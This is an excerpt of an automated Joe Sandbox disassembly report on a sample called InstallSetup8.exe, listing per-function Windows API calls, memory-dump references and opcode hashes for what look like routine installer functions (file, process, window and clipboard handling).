
Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNEL32(00437800,?), ref: 00405AED
GetLastError.KERNEL32 ref: 00405AFB

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
Instruction ID: ed7a645988c2e2a06802fdc928ba12763e2e88a5fcf473fdfb2f1107ef0c66eb
Opcode Fuzzy Hash: 93d1f65b513afb97053b6d969de6af344d99c991354c8e43ed6bd2c6eb9068ab
Instruction Fuzzy Hash: 56F0F970D0060DDBDB00CFA4C5497DFBBB4AB04305F00812AD545B6281D7B95248CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00405B3A Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID:
API String ID: 3712363035-0
Opcode ID: 6fd2602221babf1a8a9a6246b82f99e4ae13039f11edd6951af80fecf8f79ee2
Instruction ID: b1032d8704f3223f2a9afbe03a7757fefc60a77e8ecf1711bb84520e71ece662
Opcode Fuzzy Hash: 6fd2602221babf1a8a9a6246b82f99e4ae13039f11edd6951af80fecf8f79ee2
Instruction Fuzzy Hash: 91E09AB4600219BFEB109B74AD06F7B767CE704604F408475BD15E2151D774A8158A78

Uniqueness

Uniqueness Score: -1.00%

Function 0040694B Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
GetProcAddress.KERNEL32(00000000,?), ref: 00406978

Part of subcall function 004068DB: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
Part of subcall function 004068DB: wsprintfW.USER32 ref: 0040692D
Part of subcall function 004068DB: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406941

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: fa9529b661a20328ef717d54741181462d2da8a99b8882de0ad3477ad76f042b
Instruction ID: ff64ee7455e026c1647d72c339307a336527f79dacb59e64982fca04d7429b22
Opcode Fuzzy Hash: fa9529b661a20328ef717d54741181462d2da8a99b8882de0ad3477ad76f042b
Instruction Fuzzy Hash: 38E08673504210AFD61057705D04D27B3A89F85740302443EF946F2140DB34DC32ABA9

Uniqueness

Uniqueness Score: -1.00%

Function 00406047 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(00000003,004030C2,C:\Users\user\AppData\Local\Temp\InstallSetup8.exe,80000000,00000003), ref: 0040604B
CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15

Uniqueness

Uniqueness Score: -1.00%

Function 00406022 Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,?,00405C27,?,?,00000000,00405DFD,?,?,?,?), ref: 00406027
SetFileAttributesW.KERNEL32(?,00000000), ref: 0040603B

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
Instruction ID: 97cbb32404f08d1f6fed837f871d2b37f55cf766f9720be9b575451f5cdabe77
Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
Instruction Fuzzy Hash: A3D0C972504220AFC2102728AE0889BBB55EB542717028A35FCA9A22B0CB304CA68694

Uniqueness

Uniqueness Score: -1.00%

Function 00405B05 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(?,00000000,00403525,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405B0B
GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405B19

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
Instruction ID: 8c4969e502f5bc4c8dfdefb7e9c2ba363b64d1215f12130c86bef4ebeef6f559
Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
Instruction Fuzzy Hash: 19C08C30310902DACA802B209F087173960AB80340F158439A683E00B4CA30A065C92D

Uniqueness

Uniqueness Score: -1.00%

Function 004060CA Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E7,00000000,00000000,0040330B,000000FF,00000004,00000000,00000000,00000000), ref: 004060DE

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
Instruction ID: a77d82ba430c16999eb1f2306cb11816df14181100402a9e04059793f1b3015d
Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
Instruction Fuzzy Hash: 21E08632150219ABCF10DF948C00EEB3B9CFF04390F018436FD11E3040D630E92197A4

Uniqueness

Uniqueness Score: -1.00%

Function 004060F9 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040349D,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 0040610D

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
Instruction ID: 78408803ccc59d93ae5352641a5e7b8f709900c8df5e8e9e13d69f82a1dcf02f
Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
Instruction Fuzzy Hash: 8FE08C3220021ABBCF109E908C00EEB3FACEB003A0F014432FA26E6050D670E83097A4

Uniqueness

Uniqueness Score: -1.00%

Function 004034EA Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(00000000,00000000,00000000,00403247,?), ref: 004034F8

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 00401FA9 Relevance: 1.3, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 004055DC: lstrlenW.KERNEL32(0042BA48,00000000,00428E20,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,0042BA48,00000000,00428E20,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
Part of subcall function 004055DC: lstrcatW.KERNEL32(0042BA48,0040341D), ref: 00405637
Part of subcall function 004055DC: SetWindowTextW.USER32(0042BA48,0042BA48), ref: 00405649
Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697

Part of subcall function 00405B3A: CreateProcessW.KERNEL32(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FF0

Part of subcall function 004069F6: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406A07
Part of subcall function 004069F6: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A29

Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: 23aa4ee629d2d375094aa14ebaeeae63623eaa73686822291d3629d93c53ad1e
Instruction ID: 72ab4701d282d41bfb99937ccb951c9b3d992b5a19319da95f503844dddfcbd3
Opcode Fuzzy Hash: 23aa4ee629d2d375094aa14ebaeeae63623eaa73686822291d3629d93c53ad1e
Instruction Fuzzy Hash: EEF0F032804015ABCB20BBA199849DE72B5CF00318B21413FE102B21D1C77C0E42AA6E

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040571B Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 00405779
GetDlgItem.USER32(?,000003EE), ref: 00405788
GetClientRect.USER32(?,?), ref: 004057C5
GetSystemMetrics.USER32(00000002), ref: 004057CC
SendMessageW.USER32(?,00001061,00000000,?), ref: 004057ED
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057FE
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405811
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040581F
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405832
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405854
ShowWindow.USER32(?,00000008), ref: 00405868
GetDlgItem.USER32(?,000003EC), ref: 00405889
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405899
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004058B2
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058BE
GetDlgItem.USER32(?,000003F8), ref: 00405797

Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519

GetDlgItem.USER32(?,000003EC), ref: 004058DB
CreateThread.KERNEL32(00000000,00000000,Function_000056AF,00000000), ref: 004058E9
CloseHandle.KERNEL32(00000000), ref: 004058F0
ShowWindow.USER32(00000000), ref: 00405914
ShowWindow.USER32(?,00000008), ref: 00405919
ShowWindow.USER32(00000008), ref: 00405963
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405997
CreatePopupMenu.USER32 ref: 004059A8
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059BC
GetWindowRect.USER32(?,?), ref: 004059DC
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059F5
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A2D
OpenClipboard.USER32(00000000), ref: 00405A3D
EmptyClipboard.USER32 ref: 00405A43
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A4F
GlobalLock.KERNEL32(00000000), ref: 00405A59
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A6D
GlobalUnlock.KERNEL32(00000000), ref: 00405A8D
SetClipboardData.USER32(0000000D,00000000), ref: 00405A98
CloseClipboard.USER32 ref: 00405A9E

Strings

{, xrefs: 00405981

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 6951b3530aa72caf7521df0bf8db88f5d1408e2bb92485539c1303395de87c8c
Instruction ID: 234ab3d0ec1f6487b719ed7b99e1d6b4405f443d9e8d78e252fa94ab3ac4d3a1
Opcode Fuzzy Hash: 6951b3530aa72caf7521df0bf8db88f5d1408e2bb92485539c1303395de87c8c
Instruction Fuzzy Hash: 34B139B1900608FFDB11AF60DD89AAE7B79FB48355F00813AFA41BA1A0C7785A51DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00404F43 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404F5B
GetDlgItem.USER32(?,00000408), ref: 00404F66
GlobalAlloc.KERNEL32(00000040,?), ref: 00404FB0
LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FC7
SetWindowLongW.USER32(?,000000FC,00405550), ref: 00404FE0
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FF4
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405006
SendMessageW.USER32(?,00001109,00000002), ref: 0040501C
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405028
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 0040503A
DeleteObject.GDI32(00000000), ref: 0040503D
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405068
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405074
SendMessageW.USER32(?,00001132,00000000,?), ref: 0040510F
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040513F

Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519

SendMessageW.USER32(?,00001132,00000000,?), ref: 00405153
GetWindowLongW.USER32(?,000000F0), ref: 00405181
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040518F
ShowWindow.USER32(?,00000005), ref: 0040519F
SendMessageW.USER32(?,00000419,00000000,?), ref: 0040529A
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052FF
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405314
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405338
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405358
ImageList_Destroy.COMCTL32(?), ref: 0040536D
GlobalFree.KERNEL32(?), ref: 0040537D
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053F6
SendMessageW.USER32(?,00001102,?,?), ref: 0040549F
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004054AE
InvalidateRect.USER32(?,00000000,00000001), ref: 004054D9
ShowWindow.USER32(?,00000000), ref: 00405527
GetDlgItem.USER32(?,000003FE), ref: 00405532
ShowWindow.USER32(00000000), ref: 00405539

Strings

, xrefs: 00405511
N, xrefs: 004051D8
M, xrefs: 004050F7

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 14683326fe5d0e21a3b01d942e888f99a0d9647cceadcd168bf81575faddcc86
Instruction ID: 91097811874ce85ba3cc7540bcf7dd58db25a3d6f071223140e4d1ec27d7ea12
Opcode Fuzzy Hash: 14683326fe5d0e21a3b01d942e888f99a0d9647cceadcd168bf81575faddcc86
Instruction Fuzzy Hash: 6C029C70900608AFDF20DF94DD85AAF7BB5FB85314F10817AE611BA2E1D7798A41CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00403FD7 Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404013
ShowWindow.USER32(?), ref: 00404033
GetWindowLongW.USER32(?,000000F0), ref: 00404045
ShowWindow.USER32(?,00000004), ref: 0040405E
DestroyWindow.USER32 ref: 00404072
SetWindowLongW.USER32(?,00000000,00000000), ref: 0040408B
GetDlgItem.USER32(?,?), ref: 004040AA
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040BE
IsWindowEnabled.USER32(00000000), ref: 004040C5
GetDlgItem.USER32(?,00000001), ref: 00404170
GetDlgItem.USER32(?,00000002), ref: 0040417A
